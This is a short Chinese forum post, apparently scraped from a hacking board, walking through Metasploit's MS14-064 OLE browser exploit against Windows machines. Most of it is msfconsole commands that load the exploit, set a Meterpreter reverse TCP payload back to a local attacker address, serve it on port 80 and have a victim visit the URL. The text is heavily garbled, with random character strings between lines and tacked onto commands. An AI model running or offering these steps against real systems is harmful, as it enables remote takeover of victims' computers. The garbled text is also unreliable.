% }3 G. H: t f+ R$ ~
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
3 r' v t; P0 _6 n
' |* Q* A, l7 x" m' e! A" q' W* u
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
$ _' Y& Q: ~- \: L+ {
{) T4 [9 u' g1 W: B* h% R+ ?/ G! e! \+ v2 z# e
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp2 w4 w' V# a8 F! x
* @4 O8 E6 \! s- W% }( @ q. ~0 H. k% W
set AllowPowershellPrompt true2 E k2 H. T4 {1 |+ M9 [9 n, b
- M. @5 B- w6 g! S: \8 L
; a- X r& C6 |. M! H6 \ Set LHOST 192.168.0.109
1 \( J1 {4 R5 {% |
" q7 x1 S ]+ h9 |" L+ Z
) g0 O6 P* ~ k. R( L' {$ o set SRVHOST 192.168.0.109
6 t$ X. ]# {! A/ P4 i9 e
% }" }$ Z# s7 }3 h J" ?( a7 \
0 J# f, W5 H* L Set uripath share
: x+ u4 G) z/ p2 `% e/ f* _! M
) I0 _# e1 s1 S: U7 ~ H- D0 P$ \, k! \
Set srvport 80
5 G# ^" z' `7 c( S9 b' G
& ]5 h8 E$ Q7 V& u: b9 T+ L( S; t* O% j* g9 D! c) D
* l: B$ ~4 s3 y4 r- D% _1 Y
+ }8 Q3 @* {% y6 M4 L
* ]; Y- c8 ]5 e2 L7 ]5 \
x; L; A6 w7 `6 `
1 X! m; O P( f, O6 q. l$ H
$ \2 _; h( U. q' Y% A
/ i" J2 w: H$ K; o
4 J g9 A8 f8 c" B a
1 O, e/ N! Q, T% g% s
1 p1 h! o F( y. H) r
8 e9 D7 I4 C2 i0 f7 A
g0 H0 s7 x" Z8 t8 C/ K9 P p! C+ Z) m$ `8 o; m
) S( z7 m2 F& _) m
/ t/ Y4 S& k% N' @ 下面我们来访问本地地址如图:: j9 N9 y2 }1 {* `7 b
: i1 }6 E5 w; z$ q' r0 \9 M" j7 y1 a2 N: U; L1 O1 p" j* J, l
0 A: r/ F D' J3 G5 D
9 O9 ^% x5 s& f7 ]9 J% _4 y# f5 z0 c
7 |8 q& L6 `7 B
. A4 P; l a- ~, r
. ~2 a r4 L d6 O. e- A b$ Z% N
9 D8 H! S! S5 E